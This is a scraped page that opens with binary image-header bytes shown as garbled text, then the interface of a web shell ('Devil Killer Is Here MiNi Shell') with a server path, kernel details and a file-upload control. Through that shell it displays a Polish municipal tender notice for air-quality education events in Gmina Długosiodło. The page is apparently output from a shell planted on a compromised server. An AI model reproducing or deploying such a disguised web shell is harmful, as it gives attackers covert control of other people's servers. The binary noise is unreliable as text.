JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250924/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250924/0044032201-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Działania edukacyjne w zakresie ochrony powietrza dla mieszkańców Gminy Długosiodło w ramach projektu „Mazowsze bez smogu” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Długosiodło</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 550668114</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">T. Kościuszki 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Długosiodło</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">07-210</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL924 - Ostrołęcki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 29 64 23 650</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 29 74 12 526</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">gmina@dlugosiodlo.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.dlugosiodlo.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Działania edukacyjne w zakresie ochrony powietrza dla mieszkańców Gminy Długosiodło w ramach projektu „Mazowsze bez smogu” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c14d02ed-8ab6-4654-af86-2819fb50d487</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00440322</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00043499/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Prowadzenie działań edukacyjnych w ramach projektu &#34;Mazowsze bez smogu&#34;</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa, polegająca na przeprowadzeniu działań edukacyjnych w zakresie ochrony powietrza dla mieszkańców Gminy Długosiodło w ramach projektu pn.: ,,Mazowsze bez smogu” realizowanego w ramach Priorytetu: II: ,,Fundusze Europejskie na zielony rozwój Mazowsza” Działanie: 2.1: ,,Efektywność energetyczna” programu Fundusze Europejskie dla Mazowsza 2021-2027. </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://dlugosiodlo.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://dlugosiodlo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1) W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem Platformy zakupowej znajdującej<br/>się pod adresem: https://dlugosiodlo.ezamawiajacy.pl poprzez kafelek „Wiadomości” kierujący do modułu korespondencji lub poczty<br/>elektronicznej t.orlowski@dlugosiodlo.pl<br/>2) Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/>terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/>zawiadomień oraz informacji przekazywanych na adres e-mail Zamawiającego przyjmuje się datę dostarczenia wiadomości na adres<br/>e-mail Zamawiającego. W przypadku skorzystania z Platformy za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji<br/>przyjmuje się datę ich złożenia/wysłania na Platformie.<br/>3) Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi założyć darmowe konto na<br/>Platformie zakupowej. Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie Gminy<br/>Długosiodło: https://dlugosiodlo.ezamawiajacy.pl lub https://oneplace.marketplanet.pl.<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl, gdzie<br/>zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki<br/>procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>regulamin, klika polecenie „Zarejestruj się”.<br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/>Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej<br/>za pośrednictwem Platformy Zakupowej. Za datę przekazania zawiadomień oraz informacji przyjmuje się datę ich wysłania poprzez<br/>kafelek „Wiadomości” kierujący do modułu korespondencji.<br/>5) Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca<br/>winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma Zakupowa Gminy Długosiodło tel. +48 22 257 22 23<br/>(infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>6) Zamawiający określa niezbędne wymagania sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>- stały dostęp do sieci Internet o gwarantowanej przepustowości pobierania<br/>i wysyłania danych nie mniejszej niż 512 kb/s;<br/>- komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego<br/>oraz wymagania<br/>używanej<br/>przeglądarki internetowej;<br/>- zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta<br/>obsługująca TLS 1.2;<br/>- zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>7) Zamawiający określa dopuszczalną wielkość przesyłanych plików do 100 MB.<br/>8) Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.: plik załączony przez Wykonawcę na Platformie<br/>Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku<br/>dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>9) Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg czasu lokalnego<br/>serwera synchronizowanego z Głównym Urzędem Miar, który udostępnia poprzez Internet usługę umożliwiającą synchronizację<br/>czasu w systemach komputerowych z czasem urzędowym obowiązującym w Polsce.<br/>10) Osoby upoważnione do porozumiewania się z Wykonawcami: w zakresie merytorycznym: Marta Baranowska, tel. 29 64 23 695,<br/>w zakresie formalno-prawnym: Tomasz Orłowski, tel. 29 64 23 656.<br/>11) Pozostałe wymagania dotyczące korespondencji zostały opisane w SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016), dalej „RODO”, informujemy, że: <br/>1)	administratorem Pani/Pana danych osobowych jest Gmina Długosiodło, ul. T. Kościuszki 2, 07-210 Długosiodło reprezentowana przez Wójta Gminy Długosiodło;<br/>2)	Administrator powołał inspektora ochrony danych osobowych, z którym można skontaktować się pisząc na adres e-mail: gmina@dlugosiodlo.pl bądź pocztą tradycyjną na adres wskazany powyżej;<br/>3)	dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego – Działania edukacyjne w zakresie ochrony powietrza dla mieszkańców Gminy Długosiodło w ramach projektu „Mazowsze bez smogu” prowadzonym w trybie podstawowym bez negocjacji, zawarciem, realizacją oraz egzekucją umowy;<br/>4)	odbiorcami danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18 i 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 2019 ze zm.), dalej „ustawa Pzp”, upoważnieni pracownicy Urzędu Gminy oraz spółka Otwarty Rynek Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisana do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st. Warszawy <br/>w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Gmina Długosiodło prowadzi postępowania o udzielenie zamówienia publicznego, działająca pod adresem: https://dlugosiodlo.ezamawiajacy.pl; <br/>5)	wszelkie dane powierzone przez wykonawcę będą przechowywane przez okres wynikający z zapisów Rozporządzenia Prezesa Rady Ministrów z dnia 18 stycznia 2011 r. w sprawie instrukcji kancelaryjnej, jednolitych rzeczowych wykazów akt oraz instrukcji w sprawie organizacji i zakresu działania archiwów zakładowych (Dz. U. z 2011 r., Nr 14, poz. 67 ze zm.), <br/>6)	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>7)	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>8)	posiada Pani/Pan:<br/>	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9)	nie przysługuje Pani/Panu:<br/>	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zapisy dot. ochrony danych osobowych określono w rozdziale I pkt 14 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZ.271.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres przedmiotu zamówienia obejmuje:<br/>1) Organizację i przeprowadzenie trzech wydarzeń w 2025 roku oraz po sześć wydarzeń organizowanych cyklicznie w latach 2026-2028, w formie: festynu/pikniku, wycieczki edukacyjnej, konkursów tematycznych, wystaw, happeningów, warsztatów/szkoleń skierowanych do trzech grup społecznych: <br/>-ogół społeczeństwa (w tym grupa młodzieży od 13 roku życia - uczniowie klas VI-VIII)- jedno w roku 2025 i po dwa w każdym kolejnym roku , jedno w każdym półroczu,<br/>- grupy wymagającej szczególnego wsparcia (seniorzy oraz osoby ubogie energetycznie) jedno w roku 2025 i po dwa w każdym kolejnym roku , jedno w każdym półroczu,<br/>-grupy opiniotwórczej jedno w roku 2025 i po dwa w każdym kolejnym roku, jedno w każdym półroczu.<br/>Tematyka:<br/>Edukacja ekologiczna powinna obejmować formy kształcenia, zmiany postaw, zachowań i poglądów, a także przekazywanie umiejętności, wiedzy i nauka szacunku dla powietrza. Edukacja powinna stanowić czynnik mobilizujący do samodzielnego podejmowania działań na rzecz ochrony powietrza.<br/>Materiały:<br/>materiały przygotowywane przez Wykonawcę na potrzeby realizacji przedmiotu umowy muszą:<br/>1.	spełniać standardy i wytyczne mediów, w których mają być publikowane (np. rozmiar <br/>w pikselach, proporcje obraz/tekst itp.),<br/>2.	być zgodne z zapisami Podręcznika wnioskodawcy i beneficjenta Funduszy Europejskich na lata 2021-2027 w zakresie informacji i promocji. Wszystkie publikowane materiały muszą uwzględniać wymagania z zakresu informacji i promocji dot. projektów współfinansowanych <br/>z funduszy europejskich.<br/>3.	być przygotowane zgodnie z Wytycznymi dotyczącymi realizacji zasad równościowych <br/>w ramach funduszy unijnych na lata 2021-2027. W przypadku wejścia w życie innych wytycznych dotyczących standardów dostępności w trakcie trwania umowy, także do zapoznania się i stosowania nowych zasad.<br/>4.	spełniać standardy dotyczące dostępności.<br/> ochrony powietrza, walki ze smogiem i skutkach dla zdrowia. <br/><br/>Czas trwania:<br/>-jedno wydarzenie to około 2h-4h, zgodnie ze scenariuszem edukacyjnym - załącznik nr 9 do SWZ, każdorazowo program uzgadniany z Zamawiającym, wymagana jest akceptacja na zmiany.<br/>Opis:<br/>1) Zaprojektowanie i wydruk trzech gier wielkoformatowych o minimalnych wymiarach <br/>3x4 m (projekt do potwierdzenia przez zamawiającego).<br/>2) Zaprojektowanie i wydruk trzech różniących się prezentowaną treścią puzzli wielkoformatowych o minimalnych wymiarach 3x1,5m (projekt do potwierdzenia przez zamawiającego).<br/>3) Wykonanie jednego roll-up z grafiką tematyczną walka ze smogiem i wpływ smogu na zdrowie człowieka ( projekt do potwierdzenia przez zamawiającego).<br/>4) Wykonanie banera informującego o realizacji projektu „Mazowsze bez smogu” według obowiązującego wzoru( projekt do potwierdzenia przez zamawiającego). <br/>5) Wykonie namiotu wystawienniczego o wymiarach 3x6 m, z obowiązującymi logotypami i oznaczeniami.( projekt do potwierdzenia przez zamawiającego).<br/>6) Projekt graficzny i wydruk min. 1000 egzemplarzy ulotek o minimalnym formacie A5 na lata 2025 i 2026 oraz 1000 egzemplarzy ulotek o minimalnym formacie A5 na lata 2027 i 2028.<br/>7) Projekt graficzny i wydruk broszur minimum 2000 sztuk (w roku 2025 i 2026), w tym 1000 sztuk dla młodzieży powyżej 13 roku życia (łatwo przyswajalny tekst, zagadki, łamigłówki i krzyżówki), 1000 sztuk dla osób dorosłych. Projekt graficzny i wydruk broszur minimum 2000 sztuk (w roku 2027 i 2028), w tym 1000 sztuk dla młodzieży powyżej 13 roku życia (łatwo przyswajalny tekst, zagadki, łamigłówki i krzyżówki), 1000 sztuk dla osób dorosłych. Broszury zawierać powinny minimum 8 stron format A5.<br/>8) Przygotowanie prezentacji edukacyjnych (jedna na lata 2025, 2026 oraz jedna na lata 2027, 2028) - profesjonale slajdy z grafiką, animacją i treścią edukacyjną przedstawiająca aktualne dane i obowiązujące przepisy prawne odpowiednio dostosowane do programu dla poszczególnych grup warsztatowych.<br/>9) Oznakowanie wszystkich treści edukacyjnych poniższymi logotypami zgodnymi z założeniami projektu „Mazowsze bez smogu”.<br/>10) Plakaty (5 sztuk na każde wydarzenie) informujące o wydarzeniach w formacie A2, druk jednostronny, pełny kolor. Przedłożenie przez Wykonawcę projektu plakatu nie później niż 20 dni przed datą wydarzenia określoną w Scenariuszu edukacyjnym. Naniesienie poprawek (jeżeli będą konieczne) i akceptacja przez Zamawiającego projektu plakatu: 5 dni od przekazania projektu. Akceptacja przez Wykonawcę: 2 dni od przekazania zaakceptowanego przez Zamawiającego projektu plakatu. Wydruk i dostarczenie plakatów do siedziby Zamawiającego w terminie do 8 dni przed datą wydarzenia określoną w Scenariuszu. Projekt plakatu winien zawierać informacje o możliwości wykorzystania wizerunku osób biorących udział w wydarzeniach.<br/><br/><br/>Zobowiązania:<br/>1)Wykonawca zobowiązuję się (wszystkie akcje edukacyjne, przez cały czas trwania umowy) do świadczenia usługi na profesjonalnym poziomie i z należytą starannością, z zastosowaniem wiedzy i umiejętności niezbędnych do wykonania niniejszej umowy, zgodnie z wymogami wskazanymi przez Zamawiającymi, dotyczącymi realizacji projektów w ramach Programu ,,Mazowsze bez smogu”.<br/>2)Wykonawca w ramach usługi zobowiązuje się (wszystkie akcje edukacyjne, przez cały czas trwania umowy) do:<br/>-uzgodnienia wraz z Zamawiającym, ostatecznego programu edukacyjnego dla grup biorących udział w warsztatach edukacyjnych;<br/>-przesłanie do akceptacji wszystkich wytworzonych materiałów i treści edukacyjnych ,,Mazowsze bez smogu”;<br/>-zapewnienia prowadzących o odpowiednim przygotowaniu do realizacji warsztatów;<br/>-zapewnienia ciągłości przeprowadzenia wydarzeń, np. w razie braku możliwości prowadzenia warsztatów przez wyznaczonego trenera, zaproponowanie innego prowadzącego, prezentującego odpowiedni poziom wiedzy merytorycznej lub przeniesienie (odrobienie) zajęć w innym terminie;<br/>-przeprowadzenia działań edukacyjnych zgodnie z programem i scenariuszem uzgodnionym z Zamawiającym;<br/>-wyposażenia uczestników w materiały edukacyjne w formie elektronicznej <br/>i papierowej, przekazania jednego egzemplarza tych materiałów w formie papierowej i elektronicznej Zamawiającemu;<br/>-zapewnienia sprzętu niezbędnego do przeprowadzenia działań edukacyjnych (np. nagłośnienia adekwatne do organizowanych działań, krytej sceny o wymiarach min. 4x5 m itp.);<br/>-przeprowadzenie działań edukacyjnych we wskazanym miejscu;<br/>-przeprowadzenie ankiety ewaluacyjnej po zakończeniu realizacji warsztatów merytorycznych;<br/>-prowadzenia, gromadzenia i przekazania Zamawiającemu dokumentacji związanej z realizacją działań edukacyjnych (m.in. zdjęć, zaproszeń, list obecności, ankiet ewaluacyjnych, raportu końcowego z realizacji zadania – linki, zrzuty ekranu itp.) zgodnej z wzorami, przekazanymi przez Zamawiającego;<br/>-sprawowania nadzoru merytorycznego nad realizacją programu działań edukacyjnych;<br/>-przestrzegania przepisów dotyczących ochrony danych osobowych koniecznych przy realizacji projektu;<br/>-raport powinien być dostarczony w terminie 7 dni po zakończeniu kampanii edukacyjno- informacyjnej oraz wydruku dystrybucji materiałów edukacyjno – informacyjnych w każdym roku;<br/>-wszystkie działania związane z realizacją przedmiotowej umowy będą monitorowane przez ekodoradcę.<br/><br/>Przedmiot zamówienia należy wykonać zgodnie z Zasadami komunikacji marki Fundusze Europejskie 2021-2027 <br/>(https://www.funduszeeuropejskie.gov.pl/strony/o-funduszach/fundusze-2021-2027/prawo-i-dokumenty/zasady-komunikacji-fe/) </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80540000-1 - Usługi szkolenia w dziedzinie środowiska naturalnego</p> <p class="mb-0">79341400-0 - Usługi prowadzenia kampanii reklamowych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2028-11-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Znaczenie (%)<br/>1. Cena brutto oferty (C)	60%<br/>2.	Doświadczenie osoby uczestniczącej <br/>w przeprowadzeniu działań edukacyjnych (D)	40%<br/>	Razem	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej przez komisję przetargową. 